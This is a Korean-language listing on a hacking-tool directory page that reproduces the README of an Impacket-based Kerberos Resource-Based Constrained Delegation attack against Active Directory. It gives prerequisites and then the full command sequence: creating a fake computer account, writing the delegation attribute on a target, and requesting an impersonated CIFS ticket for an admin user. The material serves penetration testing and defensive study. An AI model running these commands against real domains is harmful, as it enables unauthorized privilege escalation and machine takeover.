Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
rbcd-attack — 외부에서 Impacket을 사용한 Kerberos Resource-Based Constrained Delegation 공격 | Kitploit
도구/GitHubGitHub/tothi/rbcd-attack
Privilege EscalationExploitationPenetration Testing
GitHubtothi/rbcd-attack

rbcd-attack

외부에서 Impacket을 사용한 Kerberos Resource-Based Constrained Delegation 공격

저장소 보기
646721년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Kerberos 리소스 기반 제한 위임 남용

TL;DR

이 저장소는 Windows Active Directory 도메인에서 Kerberos 리소스 기반 제한 위임(Resource-Based Constrained Delegation)에 대한 실제 공격에 관한 것입니다.

다른 일반적인 구현과의 차이점은 Windows 도메인 외부에서 공격을 시작한다는 점입니다. 즉, 도메인에 가입된 (보통 Windows) 컴퓨터가 아닌 곳에서 공격합니다.

이 공격은 Python3 Impacket만 사용하여 (그리고 그 의존성) 구현되었습니다. 최신 Impacket(작성 시점 기준 0.9.21)으로 Arch에서 테스트되었습니다.

공격 로그

공격

요약하자면, 깊은 세부 사항 없이 이 공격은 도메인 컴퓨터, 정확히는 대상 도메인 컴퓨터와 관련된 서비스 사용자(service principals)를 대상으로 합니다.

필요한 전제 조건:

  • 대상 컴퓨터에 대한 쓰기 액세스 권한이 있는 도메인 계정(정확히는 대상 컴퓨터 도메인 개체의 msDS-AllowedToActOnBehalfOfOtherIdentity 속성에 대한 쓰기 액세스)
  • 새 컴퓨터 계정을 만들 수 있는 권한(일반적으로 기본값이며, MachineAccountQuota 참조)
  • DC에 대한 LDAP (389/tcp) 및 SAMR (445/tcp) (또는 LDAPS (636/tcp)) 액세스
  • DC에 대한 Kerberos (88/tcp) 액세스

매우 높은 수준의 공격 경로:

  1. 가짜 컴퓨터를 생성
  2. 대상 컴퓨터의 msDS-AllowedToActOnBehalfOfOtherIdentity 속성 남용
  3. 대상 컴퓨터에 대한 가장된 서비스 티켓(S4U) 요청

이점:

  • 가장된 서비스 티켓은 가장된 계정에 권한이 있는 경우 대상의 CIFS, HTTP 등과 같은 서비스에 대한 높은 수준의 액세스를 허용할 수 있습니다. 때로는 컴퓨터 장악으로 이어집니다.

일반적인 도구 세트

이 공격에 대한 일반적인 도구 세트는 도메인에 가입된 Windows 컴퓨터에서 다음을 사용하여 작동합니다:

  • Powermad - 새 컴퓨터 계정 추가용
  • PowerSploit dev 브랜치의 Powerview - msDS-AllowedToActOnBehalfOfOtherIdentity 남용용
  • Rubeus - S4U 티켓 작업용

Impacket 구현

이 구현은 도메인 외부에서 순수 Impacket을 사용합니다.

가짜 컴퓨터 생성

Impacket의 addcomputer.py 예제를 사용하여 가짜 컴퓨터(evilcomputer)를 생성해 보겠습니다:

root@kitploit:~
addcomputer.py -computer-name 'evilcomputer$' -computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0

위임 권한 수정

저장소에 있는 rbcd.py 스크립트를 구현했습니다. 이 스크립트는 새로 생성된 EVILCOMPUTER의 관련 보안 설명자를 대상 컴퓨터의 msDS-AllowedToActOnBehalfOfOtherIdentity 속성에 추가합니다.

root@kitploit:~
./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0

이 스크립트는 ntlmrelayx.py Impacket 예제의 Python 클래스를 많이 사용합니다. 도움말 및 예제를 보려면 옵션 없이 스크립트를 호출하십시오.

가장된 서비스 티켓 얻기

이제 S4U2Self 쿼리를 통해 제한 위임을 남용하고 대상 컴퓨터에 대한 가장된 서비스 티켓을 얻을 준비가 되었습니다. Impacket 예제 스크립트 getST.py를 사용합니다:

root@kitploit:~
getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS

위 명령은 대상 도메인 사용자 admin을 대신하여 CIFS 서비스 티켓을 가져와 admin.ccache 파일에 저장합니다.

파일 경로를 KRB5CCNAME 변수에 추가한 후 티켓을 Kerberos 클라이언트에 사용할 수 있습니다.

root@kitploit:~
export KRB5CCNAME=`pwd`/admin.ccache
klist

참고 자료

리소스 기반 제한 위임 남용에 대한 자세한 내용:

  • https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
  • https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/
  • http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/

그리고 Kerberos 공격에 대한 가장 포괄적인 프레젠테이션 중 하나:

  • Constructing Kerberos Attacks with Delegation Primitives slides - Defcon 발표자료, Elad Shamir 및 Matt Bush
도구 다운로드